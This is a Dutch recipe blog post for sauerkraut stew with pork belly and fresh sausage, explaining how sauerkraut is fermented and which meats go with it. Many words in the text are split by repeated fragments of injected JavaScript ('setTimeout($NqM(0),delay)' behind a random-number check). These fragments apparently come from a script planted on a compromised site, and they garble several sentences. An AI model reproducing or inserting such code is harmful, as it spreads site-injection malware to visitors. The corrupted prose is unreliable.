De winter komt er weer aan en dan maak ik graag mijn absolute lievelingskostje; zuurkool. Niet zomaar een zuurkool stampot, maar een echte bourgondische sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofpot met buikspek en verse worst. Laat die winter maar komen!
Wat is zuurkool?
Zuurkool is niet meer dan geraspte of dun gesneden witte kool die door de inwerking van de melkzuurbacterie geconserveerd wordt. Omdat de kool luchtdicht wordt afgedekt, gaat deze gisten. De melkzuurbacterie zorgt er voor dat zetmeel en suikers omgezet worden in melkzuur. Hierdoor onstaat de mooi, krachtige, zure smaak. Ik vind dit echt heerlijk, maar ik ken genoeg mensen die de smaak niet kunnen waarderen. Je kunt je gerecht eventueel wat zoeter maken, door appels of rozijnen dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe te voegen.
Hoe wordt zuurkool gemaakt?
Als je echt wil weten hoe deze kool wordt gemaakt, bekijk dan eens dit filmpje. Beelden afkomstig van Wikipedia van het Polygoonjournaal uit 1945. Hie worden alle stappen gedom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toond bij het maken van zuurkool.
Verse worst!
Traditioneel wordt zuurkool stampot vaak met rookworst gegeten, maar er zijn nog meer lekkere alternatieven. Probeer eens verse worst, speklapjes, casselerrib of dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees/”>sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees. In dit gerecht zijn zelfs meerdere soorten worst gebruikt. Je kunt deze apart bakken, maar ook gewoon laten meesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toven. De kleur blijft hierdoor wel wat lichter dan als je de worst bakt in de pan. Qua smaak is het allebei net zo lekker, maar wel anders. Bij het meesdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toven proef je dat alle smaken van het gerecht echt helemaal in de worst zijn getrokken, terwijl bij bakken in de pan je weer een lekkere grill smaak krijgt.
Tip: Casselerrib kun je zowel in de supermarkt als bij de slager in dikke plakken van ongeveer een centimeter laten snijden. Dit zelfde geldt eigenlijk voor spek (ontbijtspek).
Geen Reacties op "Bourgondische zuurkool met buikspek en verse worst"